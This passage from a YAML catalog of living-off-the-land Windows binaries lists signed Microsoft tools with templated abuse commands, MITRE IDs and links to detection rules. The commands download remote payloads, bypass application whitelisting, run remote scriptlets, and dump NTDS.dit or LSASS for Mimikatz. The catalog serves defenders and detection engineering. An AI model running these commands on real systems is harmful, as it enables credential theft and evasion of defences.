Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64\mftrace.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml Resources: - Link: https://twitter.com/0rbz_/status/988911181422186496 Acknowledgement: - Person: fabrizio Handle: '@0rbz_' ================================================ FILE: yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml ================================================ --- Name: Microsoft.NodejsTools.PressAnyKey.exe Description: Part of the NodeJS Visual Studio tools. Author: mr.d0x Created: 2022-01-20 Commands: - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe} Description: Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml Resources: - Link: https://twitter.com/mrd0x/status/1463526834918854661 Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Mpiexec.yml ================================================ --- Name: Mpiexec.exe Description: Command-line tool for running Message Passing Interface (MPI) applications. Author: Avihay Eldad Created: 2025-09-25 Commands: - Command: mpiexec.exe {CMD} Description: Executes a command via MPI command-line tool. Usecase: Executes commands under a trusted, Microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: C:\Program Files\Microsoft MPI\Bin\mpiexec.exe - Path: C:\Program Files (x86)\Microsoft MPI\Bin\mpiexec.exe Resources: - Link: https://learn.microsoft.com/en-us/powershell/high-performance-computing/mpiexec Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Msaccess.yml ================================================ --- Name: MSAccess.exe Description: Microsoft Office component Author: Nir Chako Created: 2023-04-30 Commands: - Command: MSAccess.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSAccess.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSAccess.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSAccess.exe - Path: C:\Program Files\Microsoft Office\Office16\MSAccess.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSAccess.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSAccess.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSAccess.exe - Path: C:\Program Files\Microsoft Office\Office15\MSAccess.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSAccess.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSAccess.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSAccess.exe - Path: C:\Program Files\Microsoft Office\Office14\MSAccess.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSAccess.exe - Path: C:\Program Files\Microsoft Office\Office12\MSAccess.exe Detection: - IOC: URL on a MSAccess command line - IOC: MSAccess making unexpected network connections or DNS requests Acknowledgement: - Person: Nir Chako Handle: '@C_h4ck_0' ================================================ FILE: yml/OtherMSBinaries/Msdeploy.yml ================================================ --- Name: Msdeploy.exe Description: Microsoft tool used to deploy Web Applications. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}" Description: Launch .bat file via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Tags: - Execute: CMD - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}" Description: Launch .bat file via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Tags: - Execute: CMD - Command: msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext} Description: Copy file from source to destination. Usecase: Copy file. Category: Copy Privileges: User MitreID: T1105 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Full_Path: - Path: C:\Program Files\IIS\Microsoft Web Deploy V2\msdeploy.exe - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V2\msdeploy.exe - Path: C:\Program Files\IIS\Microsoft Web Deploy V3\msdeploy.exe - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe - Path: C:\Program Files\IIS\Microsoft Web Deploy V4\msdeploy.exe - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V4\msdeploy.exe - Path: C:\Program Files\IIS\Microsoft Web Deploy V5\msdeploy.exe - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V5\msdeploy.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml Resources: - Link: https://twitter.com/pabraeken/status/995837734379032576 - Link: https://twitter.com/pabraeken/status/999090532839313408 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/MsoHtmEd.yml ================================================ --- Name: MsoHtmEd.exe Description: Microsoft Office component Author: Nir Chako Created: 2022-07-24 Commands: - Command: MsoHtmEd.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe - Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml - IOC: Suspicious Office application internet/network traffic Acknowledgement: - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OtherMSBinaries/Mspub.yml ================================================ --- Name: Mspub.exe Description: Microsoft Publisher Author: Nir Chako Created: 2022-08-02 Commands: - Command: mspub.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe - Path: C:\Program Files\Microsoft Office\Office16\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe - Path: C:\Program Files\Microsoft Office\Office15\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe - Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml - IOC: Suspicious Office application internet/network traffic Acknowledgement: - Person: 'Nir Chako (Pentera)' Handle: '@C_h4ck_0' ================================================ FILE: yml/OtherMSBinaries/Msxsl.yml ================================================ --- Name: msxsl.exe Description: Command line utility used to perform XSL transformations. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: msxsl.exe {PATH:.xml} {PATH:.xsl} Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. Category: Execute Privileges: User MitreID: T1220 OperatingSystem: Windows Tags: - Execute: XSL - Command: msxsl.exe {PATH:.xml} {PATH:.xsl} Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. Category: AWL Bypass Privileges: User MitreID: T1220 OperatingSystem: Windows Tags: - Execute: XSL - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. Category: Execute Privileges: User MitreID: T1220 OperatingSystem: Windows Tags: - Execute: XSL - Execute: Remote - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml} Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. Category: AWL Bypass Privileges: User MitreID: T1220 OperatingSystem: Windows Tags: - Execute: XSL - Execute: Remote - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH} Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS). Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream. Category: ADS Privileges: User MitreID: T1564 OperatingSystem: Windows Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_msxsl_beacon.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_msxsl_network.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml Resources: - Link: https://twitter.com/subTee/status/877616321747271680 - Link: https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker - Link: https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Ronnie Salomonsen Handle: '@r0ns3n' ================================================ FILE: yml/OtherMSBinaries/Nmcap.yml ================================================ --- Name: Nmcap.exe Description: Command-line packet capture utility from Microsoft Network Monitor 3.x. Author: Avihay Eldad Created: 2025-09-16 Commands: - Command: nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap} Description: | Start capture on all network adapters and save to specified .cap (circular) file. Optionally, one can add: - `/TerminateWhen /TimeAfter 30 seconds` to auto-terminate after a relative times (e.g. 30 seconds); - `/TerminateWhen /Time 04:52:00 AM 9/17/2025` to auto-terminate after a specific date/time; - `/TerminateWhen /KeyPress x` to terminate when a specific key is pressed. Usecase: Capture network traffic on windows to collect sensitive data. Category: Reconnaissance Privileges: Administrator MitreID: T1040 OperatingSystem: Windows Full_Path: - Path: C:\Program Files\Microsoft Network Monitor 3\nmcap.exe - Path: C:\Program Files (x86)\Microsoft Network Monitor 3\nmcap.exe Resources: - Link: https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/network-monitor-3 Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Ntdsutil.yml ================================================ --- Name: ntdsutil.exe Description: Command line utility used to export Active Directory. Author: Tony Lambert Created: 2020-01-10 Commands: - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q Description: Dump NTDS.dit into folder Usecase: Dumping of Active Directory NTDS.dit database Category: Dump Privileges: Administrator MitreID: T1003.003 OperatingSystem: Windows Full_Path: - Path: C:\Windows\System32\ntdsutil.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - IOC: ntdsutil.exe with command line including "ifm" Resources: - Link: https://adsecurity.org/?p=2398#CreateIFM Acknowledgement: - Person: Sean Metcalf Handle: '@PyroTek3' ================================================ FILE: yml/OtherMSBinaries/Ntsd.yml ================================================ --- Name: Ntsd.exe Description: Symbolic Debugger for Windows. Author: Avihay Eldad Created: 2025-07-16 Commands: - Command: ntsd.exe -g {CMD} Description: Launches command through the debugging process; optionally add `-G` to exit the debugger automatically. Usecase: Executes an executable under a trusted microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\ntsd.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\ntsd.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm\ntsd.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm64\ntsd.exe Resources: - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://strontic.github.io/xcyclopedia/library/ntsd.exe-629EA12D527237B9CD945AC44C2DE80D.html Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/OpenConsole.yml ================================================ --- Name: OpenConsole.exe Description: Console Window host for Windows Terminal Author: Nasreddine Bencherchali Created: 2022-06-17 Commands: - Command: OpenConsole.exe {PATH:.exe} Description: Execute specified process with OpenConsole.exe as parent process Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\OpenConsole.exe Detection: - IOC: OpenConsole.exe spawning unexpected processes - Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml Resources: - Link: https://twitter.com/nas_bench/status/1537563834478645252 Acknowledgement: - Person: Nasreddine Bencherchali Handle: '@nas_bench' ================================================ FILE: yml/OtherMSBinaries/Pixtool.yml ================================================ --- Name: Pixtool.exe Description: Command line utility for taking and analyzing PIX GPU captures. Author: Avihay Eldad Created: 2025-09-21 Commands: - Command: pixtool.exe launch {PATH_ABSOLUTE:.exe} Description: Launches an executable via PIX command-line utility. Usecase: Executes an executable under a trusted, Microsoft signed binary. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Microsoft PIX\pixtool.exe - Path: C:\Program Files (x86)\Microsoft PIX\pixtool.exe Resources: - Link: https://devblogs.microsoft.com/pix/pixtool/ Acknowledgement: - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Powerpnt.yml ================================================ --- Name: Powerpnt.exe Description: Microsoft Office binary. Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - Command: Powerpnt.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows Tags: - Download: INetCache Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml - IOC: Suspicious Office application Internet/network traffic Resources: - Link: https://twitter.com/reegun21/status/1150032506504151040 - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' ================================================ FILE: yml/OtherMSBinaries/Procdump.yml ================================================ --- Name: Procdump.exe Description: SysInternals Memory Dump Tool Aliases: - Alias: Procdump64.exe Author: 'Alfie Champion (@ajpc500)' Created: 2020-10-14 Commands: - Command: procdump.exe -md {PATH:.dll} explorer.exe Description: Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher Tags: - Execute: DLL - Command: procdump.exe -md {PATH:.dll} foobar Description: Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User MitreID: T1202 OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher Tags: - Execute: DLL Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - IOC: Process creation with given '-md' parameter - IOC: Anomalous child processes of procdump - IOC: Unsigned DLL load via procdump.exe or procdump64.exe Resources: - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20 Acknowledgement: - Person: Alfie Champion Handle: '@ajpc500' ================================================ FILE: yml/OtherMSBinaries/ProtocolHandler.yml ================================================ --- Name: ProtocolHandler.exe Description: Microsoft Office binary Author: Nir Chako Created: 2022-07-24 Commands: - Command: ProtocolHandler.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)" Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe - Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe - Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe - Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe - Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml - IOC: Suspicious Office application Internet/network traffic Acknowledgement: - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OtherMSBinaries/Rcsi.yml ================================================ --- Name: rcsi.exe Description: Non-Interactive command line inerface included with Visual Studio. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CSharp - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CSharp Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml Resources: - Link: https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ================================================ FILE: yml/OtherMSBinaries/Remote.yml ================================================ --- Name: Remote.exe Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-06-01 Commands: - Command: Remote.exe /s {PATH:.exe} anythinghere Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: Remote.exe /s {PATH:.exe} anythinghere Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: Remote.exe /s {PATH_SMB:.exe} anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Execute: Remote Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe Detection: - IOC: remote.exe process spawns - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml Resources: - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Sqldumper.yml ================================================ --- Name: Sqldumper.exe Description: Debugging utility included with Microsoft SQL. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sqldumper.exe 464 0 0x0110 Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). Usecase: Dump process using PID. Category: Dump Privileges: Administrator MitreID: T1003 OperatingSystem: Windows - Command: sqldumper.exe 540 0 0x01100:40 Description: 0x01100:40 flag will create a Mimikatz compatible dump file. Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows Full_Path: - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe - Path: C:\Program Files\Microsoft Power BI Desktop\bin\SqlDumper.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml Resources: - Link: https://twitter.com/countuponsec/status/910969424215232518 - Link: https://twitter.com/countuponsec/status/910977826853068800 - Link: https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ================================================ FILE: yml/OtherMSBinaries/Sqlps.yml ================================================ --- Name: Sqlps.exe Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Sqlps.exe -noprofile Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. Usecase: Execute PowerShell commands without ScriptBlock logging. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml - Splunk: 